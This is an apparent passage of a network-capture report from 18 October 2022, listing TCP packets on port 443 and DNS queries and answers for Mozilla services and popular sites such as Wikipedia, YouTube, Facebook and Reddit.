                                                                                                                              Oct 18, 2022 22:44:37.907500982 CEST4436009213.225.78.36192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:37.907526016 CEST4436009213.225.78.36192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:37.907562971 CEST60092443192.168.2.2313.225.78.36
                                                                                                                              Oct 18, 2022 22:44:37.907584906 CEST60092443192.168.2.2313.225.78.36
                                                                                                                              Oct 18, 2022 22:44:37.907879114 CEST4436009213.225.78.36192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:37.907990932 CEST60092443192.168.2.2313.225.78.36
                                                                                                                              Oct 18, 2022 22:44:37.908030987 CEST4436009213.225.78.36192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:37.951387882 CEST60092443192.168.2.2313.225.78.36
                                                                                                                              Oct 18, 2022 22:44:37.976623058 CEST60092443192.168.2.2313.225.78.36
                                                                                                                              Oct 18, 2022 22:44:37.976660967 CEST4436009213.225.78.36192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:37.976680040 CEST60092443192.168.2.2313.225.78.36
                                                                                                                              Oct 18, 2022 22:44:37.976687908 CEST4436009213.225.78.36192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:38.124130964 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.124177933 CEST4433891618.64.119.32192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:38.124228954 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.144805908 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.144836903 CEST4433891618.64.119.32192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:38.203542948 CEST4433891618.64.119.32192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:38.203618050 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.207137108 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.207153082 CEST4433891618.64.119.32192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:38.207298994 CEST4433891618.64.119.32192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:38.207403898 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.705966949 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.706008911 CEST4433891618.64.119.32192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:38.733170033 CEST4433891618.64.119.32192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:38.733309031 CEST4433891618.64.119.32192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:38.733445883 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.775345087 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.866137981 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.866138935 CEST38916443192.168.2.2318.64.119.32
                                                                                                                              Oct 18, 2022 22:44:38.866204023 CEST4433891618.64.119.32192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:38.866230011 CEST4433891618.64.119.32192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:45.881944895 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:45.881999969 CEST4435441035.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:45.882134914 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:45.884537935 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:45.884572029 CEST4435441035.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:46.277578115 CEST4435441035.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:46.277667046 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:46.282124996 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:46.282146931 CEST4435441035.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:46.282504082 CEST4435441035.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:46.282583952 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:46.627378941 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:46.627420902 CEST4435441035.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:46.820223093 CEST4435441035.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:46.820362091 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:46.820399046 CEST4435441035.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:46.867753029 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:47.180013895 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:47.180015087 CEST54410443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:44:47.180069923 CEST4435441035.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:47.180094004 CEST4435441035.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:55.870392084 CEST42836443192.168.2.2391.189.91.43
                                                                                                                              Oct 18, 2022 22:45:07.272898912 CEST54412443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:45:07.272972107 CEST4435441235.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:07.273061037 CEST54412443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:45:07.277040958 CEST54412443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:45:07.277101040 CEST4435441235.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:07.674581051 CEST4435441235.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:07.674686909 CEST54412443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:45:07.675954103 CEST54412443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:45:07.675976038 CEST4435441235.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:07.676160097 CEST4435441235.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:07.676223993 CEST54412443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:45:07.774144888 CEST54412443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:45:07.774168015 CEST4435441235.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.105237007 CEST4435441235.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.105365992 CEST54412443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:45:08.105374098 CEST4435441235.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.142995119 CEST54412443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:45:08.143027067 CEST4435441235.162.110.205192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.143043995 CEST54412443192.168.2.2335.162.110.205
                                                                                                                              Oct 18, 2022 22:45:08.143052101 CEST4435441235.162.110.205192.168.2.23
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 18, 2022 22:44:07.506622076 CEST5207553192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:07.506697893 CEST3539753192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:07.524132013 CEST53520751.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:07.524461985 CEST53353971.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:23.646236897 CEST4265753192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:23.646349907 CEST5695453192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:23.663897038 CEST53569541.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:23.663938046 CEST53426571.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:23.664448977 CEST4957753192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:23.682209015 CEST53495771.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:25.281169891 CEST4093753192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:25.299451113 CEST53409371.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:29.361918926 CEST3892153192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:29.380108118 CEST53389211.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:29.610632896 CEST3982453192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:29.628132105 CEST53398241.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:33.562047005 CEST3421753192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:33.579937935 CEST53342171.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:33.881930113 CEST6004953192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:33.882061005 CEST5762253192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:33.900055885 CEST53600491.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:33.900538921 CEST53576221.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:37.699578047 CEST3583653192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:37.699702978 CEST3510053192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:37.717933893 CEST53358361.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:37.718286991 CEST53351001.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:37.718522072 CEST4002753192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:37.739173889 CEST53400271.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:44:45.865628958 CEST4232353192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:44:45.883652925 CEST53423231.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:07.236804962 CEST4406253192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:07.258980989 CEST53440621.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.178849936 CEST3511953192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.178955078 CEST5793253192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.179374933 CEST5925953192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.179477930 CEST3754653192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.197843075 CEST53592591.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.198385954 CEST53579321.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.198736906 CEST53375461.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.198854923 CEST53351191.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.324002028 CEST3641753192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.324346066 CEST5189553192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.341842890 CEST53518951.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST53364171.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.357938051 CEST4163653192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.358242035 CEST3854853192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.375658989 CEST53385481.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.375793934 CEST53416361.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.535383940 CEST5838053192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.535556078 CEST3620453192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.553359032 CEST53583801.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.564675093 CEST53362041.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.565083027 CEST4717053192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.583842993 CEST53471701.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.629331112 CEST3858653192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.629487038 CEST5173653192.168.2.231.1.1.1
                                                                                                                              Oct 18, 2022 22:45:08.648499012 CEST53517361.1.1.1192.168.2.23
                                                                                                                              Oct 18, 2022 22:45:08.648575068 CEST53385861.1.1.1192.168.2.23
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Oct 18, 2022 22:44:07.506622076 CEST192.168.2.231.1.1.10x1cf8Standard query (0)content-signature-2.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:07.506697893 CEST192.168.2.231.1.1.10x7d43Standard query (0)content-signature-2.cdn.mozilla.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:23.646236897 CEST192.168.2.231.1.1.10xf906Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:23.646349907 CEST192.168.2.231.1.1.10x427aStandard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:23.664448977 CEST192.168.2.231.1.1.10xebf1Standard query (0)autopush.prod.mozaws.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:25.281169891 CEST192.168.2.231.1.1.10xf97cStandard query (0)autopush.prod.mozaws.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:29.361918926 CEST192.168.2.231.1.1.10xc591Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:29.610632896 CEST192.168.2.231.1.1.10xa2deStandard query (0)prod.ingestion-edge.prod.dataops.mozgcp.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:33.562047005 CEST192.168.2.231.1.1.10x13ddStandard query (0)autopush.prod.mozaws.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:33.881930113 CEST192.168.2.231.1.1.10x53c8Standard query (0)firefox.settings.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:33.882061005 CEST192.168.2.231.1.1.10x1189Standard query (0)firefox.settings.services.mozilla.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:37.699578047 CEST192.168.2.231.1.1.10x807fStandard query (0)firefox-settings-attachments.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:37.699702978 CEST192.168.2.231.1.1.10xa485Standard query (0)firefox-settings-attachments.cdn.mozilla.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:37.718522072 CEST192.168.2.231.1.1.10xb1d7Standard query (0)fennec-catalog-cdn.prod.mozaws.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:45.865628958 CEST192.168.2.231.1.1.10x9875Standard query (0)autopush.prod.mozaws.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:07.236804962 CEST192.168.2.231.1.1.10x760cStandard query (0)autopush.prod.mozaws.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.178849936 CEST192.168.2.231.1.1.10x4ff1Standard query (0)www.wikipedia.orgA (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.178955078 CEST192.168.2.231.1.1.10xa31bStandard query (0)www.wikipedia.org28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.179374933 CEST192.168.2.231.1.1.10x1c15Standard query (0)www.example.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.179477930 CEST192.168.2.231.1.1.10xeb5aStandard query (0)www.example.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.324002028 CEST192.168.2.231.1.1.10x3bb9Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.324346066 CEST192.168.2.231.1.1.10x4bfdStandard query (0)www.youtube.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.357938051 CEST192.168.2.231.1.1.10xdfd2Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.358242035 CEST192.168.2.231.1.1.10x8be1Standard query (0)www.facebook.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.535383940 CEST192.168.2.231.1.1.10x6b85Standard query (0)www.reddit.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.535556078 CEST192.168.2.231.1.1.10xd2f7Standard query (0)www.reddit.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.565083027 CEST192.168.2.231.1.1.10x54Standard query (0)reddit.map.fastly.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.629331112 CEST192.168.2.231.1.1.10x8ebfStandard query (0)twitter.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.629487038 CEST192.168.2.231.1.1.10xaadaStandard query (0)twitter.com28IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Oct 18, 2022 22:44:07.524132013 CEST1.1.1.1192.168.2.230x1cf8No error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:07.524132013 CEST1.1.1.1192.168.2.230x1cf8No error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:07.524132013 CEST1.1.1.1192.168.2.230x1cf8No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:07.524461985 CEST1.1.1.1192.168.2.230x7d43No error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:07.524461985 CEST1.1.1.1192.168.2.230x7d43No error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:07.524461985 CEST1.1.1.1192.168.2.230x7d43No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:23.663897038 CEST1.1.1.1192.168.2.230x427aNo error (0)push.services.mozilla.comautopush.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:23.663938046 CEST1.1.1.1192.168.2.230xf906No error (0)push.services.mozilla.comautopush.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:23.663938046 CEST1.1.1.1192.168.2.230xf906No error (0)autopush.prod.mozaws.net35.162.110.205A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:29.360894918 CEST1.1.1.1192.168.2.230xe62No error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:29.360894918 CEST1.1.1.1192.168.2.230xe62No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:29.361557007 CEST1.1.1.1192.168.2.230x848No error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:29.609596968 CEST1.1.1.1192.168.2.230xb53bNo error (0)telemetry-incoming.r53-2.services.mozilla.comprod.ingestion-edge.prod.dataops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:29.609596968 CEST1.1.1.1192.168.2.230xb53bNo error (0)prod.ingestion-edge.prod.dataops.mozgcp.net34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:29.609649897 CEST1.1.1.1192.168.2.230x7b7cNo error (0)telemetry-incoming.r53-2.services.mozilla.comprod.ingestion-edge.prod.dataops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:33.900055885 CEST1.1.1.1192.168.2.230x53c8No error (0)firefox.settings.services.mozilla.com18.64.119.32A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:33.900055885 CEST1.1.1.1192.168.2.230x53c8No error (0)firefox.settings.services.mozilla.com18.64.119.35A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:33.900055885 CEST1.1.1.1192.168.2.230x53c8No error (0)firefox.settings.services.mozilla.com18.64.119.116A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:33.900055885 CEST1.1.1.1192.168.2.230x53c8No error (0)firefox.settings.services.mozilla.com18.64.119.45A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:37.717933893 CEST1.1.1.1192.168.2.230x807fNo error (0)firefox-settings-attachments.cdn.mozilla.netfennec-catalog-cdn.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:37.717933893 CEST1.1.1.1192.168.2.230x807fNo error (0)fennec-catalog-cdn.prod.mozaws.net13.225.78.62A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:37.717933893 CEST1.1.1.1192.168.2.230x807fNo error (0)fennec-catalog-cdn.prod.mozaws.net13.225.78.92A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:37.717933893 CEST1.1.1.1192.168.2.230x807fNo error (0)fennec-catalog-cdn.prod.mozaws.net13.225.78.106A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:37.717933893 CEST1.1.1.1192.168.2.230x807fNo error (0)fennec-catalog-cdn.prod.mozaws.net13.225.78.36A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:44:37.718286991 CEST1.1.1.1192.168.2.230xa485No error (0)firefox-settings-attachments.cdn.mozilla.netfennec-catalog-cdn.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.197843075 CEST1.1.1.1192.168.2.230x1c15No error (0)www.example.com93.184.216.34A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.198385954 CEST1.1.1.1192.168.2.230xa31bNo error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.198385954 CEST1.1.1.1192.168.2.230xa31bNo error (0)dyna.wikimedia.org28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.198736906 CEST1.1.1.1192.168.2.230xeb5aNo error (0)www.example.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.198854923 CEST1.1.1.1192.168.2.230x4ff1No error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.198854923 CEST1.1.1.1192.168.2.230x4ff1No error (0)dyna.wikimedia.org91.198.174.192A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341842890 CEST1.1.1.1192.168.2.230x4bfdNo error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341842890 CEST1.1.1.1192.168.2.230x4bfdNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341842890 CEST1.1.1.1192.168.2.230x4bfdNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341842890 CEST1.1.1.1192.168.2.230x4bfdNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341842890 CEST1.1.1.1192.168.2.230x4bfdNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com216.58.212.142A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com172.217.16.142A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.341896057 CEST1.1.1.1192.168.2.230x3bb9No error (0)youtube-ui.l.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.375658989 CEST1.1.1.1192.168.2.230x8be1No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.375658989 CEST1.1.1.1192.168.2.230x8be1No error (0)star-mini.c10r.facebook.com28IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.375793934 CEST1.1.1.1192.168.2.230xdfd2No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.375793934 CEST1.1.1.1192.168.2.230xdfd2No error (0)star-mini.c10r.facebook.com185.60.216.35A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.553359032 CEST1.1.1.1192.168.2.230x6b85No error (0)www.reddit.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.553359032 CEST1.1.1.1192.168.2.230x6b85No error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.553359032 CEST1.1.1.1192.168.2.230x6b85No error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.553359032 CEST1.1.1.1192.168.2.230x6b85No error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.553359032 CEST1.1.1.1192.168.2.230x6b85No error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.564675093 CEST1.1.1.1192.168.2.230xd2f7No error (0)www.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
